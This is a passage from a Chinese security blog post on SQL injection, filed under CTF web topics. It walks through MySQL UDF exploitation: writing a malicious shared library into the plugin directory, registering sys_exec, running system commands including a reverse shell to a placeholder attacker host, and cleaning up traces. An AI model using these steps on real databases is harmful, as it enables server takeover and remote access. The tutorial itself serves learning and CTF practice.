<p>利用流程</p>
<h4 id="获取-MySQL-插件目录"><a href="#获取-MySQL-插件目录" class="headerlink" title="获取 MySQL 插件目录"></a>获取 MySQL 插件目录</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SHOW</span> VARIABLES <span class="hljs-keyword">LIKE</span> <span class="hljs-string">&#x27;plugin_dir&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>记住路径，比如 &#x2F;usr&#x2F;lib&#x2F;mysql&#x2F;plugin&#x2F;</p>
<h4 id="上传恶意-so-文件"><a href="#上传恶意-so-文件" class="headerlink" title="上传恶意 .so 文件"></a>上传恶意 .so 文件</h4><p>攻击者需要一个编译好的 UDF 动态库文件，通常是类似于 <a target="_blank" rel="noopener" href="https://github.com/mysqludf/lib_mysqludf_sys">lib_mysqludf_sys.so</a>，包含可执行系统命令的函数（如 sys_exec）</p>
<p>通过 SQL 注入或数据库访问权限，利用 SELECT … INTO DUMPFILE 写入这个二进制文件到 plugin_dir</p>
<p>示例：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> <span class="hljs-operator">&lt;</span>二进制内容<span class="hljs-operator">&gt;</span> <span class="hljs-keyword">INTO</span> DUMPFILE <span class="hljs-string">&#x27;/usr/lib/mysql/plugin/lib_mysqludf_sys.so&#x27;</span>;<br></code></pre></td></tr></table></figure>

<h4 id="注册-UDF-函数"><a href="#注册-UDF-函数" class="headerlink" title="注册 UDF 函数"></a>注册 UDF 函数</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">CREATE</span> <span class="hljs-keyword">FUNCTION</span> sys_exec <span class="hljs-keyword">RETURNS</span> <span class="hljs-type">int</span> SONAME <span class="hljs-string">&#x27;lib_mysqludf_sys.so&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>这条语句会将 sys_exec 函数注册进 MySQL，之后就可以在 SQL 里调用。</p>
<h4 id="执行系统命令"><a href="#执行系统命令" class="headerlink" title="执行系统命令"></a>执行系统命令</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> sys_exec(<span class="hljs-string">&#x27;whoami &gt; /tmp/whoami.txt&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>或者执行任意命令：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> sys_exec(<span class="hljs-string">&#x27;bash -c &quot;bash -i &gt;&amp; /dev/tcp/attacker_ip/port 0&gt;&amp;1&quot;&#x27;</span>);<br></code></pre></td></tr></table></figure>

<h4 id="清理痕迹（可选）"><a href="#清理痕迹（可选）" class="headerlink" title="清理痕迹（可选）"></a>清理痕迹（可选）</h4><p>删除 UDF 函数</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">DROP</span> <span class="hljs-keyword">FUNCTION</span> sys_exec;<br></code></pre></td></tr></table></figure>

<p>删除上传的 .so 文件（需系统权限）</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%8A%80%E6%9C%AF/" class="category-chain-item">技术</a>
  
  
    <span>></span>
    
  <a href="/categories/%E6%8A%80%E6%9C%AF/ctf/" class="category-chain-item">ctf</a>
  
  
    <span>></span>
    
  <a href="/categories/%E6%8A%80%E6%9C%AF/ctf/web/" class="category-chain-item">web</a>
  
  

  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web%E5%AE%89%E5%85%A8/" class="print-no-link">#web安全</a>
      
        <a href="/tags/sqli/" class="print-no-link">#sqli</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>SQLi详解</div>
      <div>https://www.xiaotian.org.cn/2025/05/22/SQLi详解/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>xiaotian</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年5月22日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/05/08/CSRF%E8%AF%A6%E8%A7%A3/" title="CSRF详解">
                        <span class="hidden-mobile">CSRF详解</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
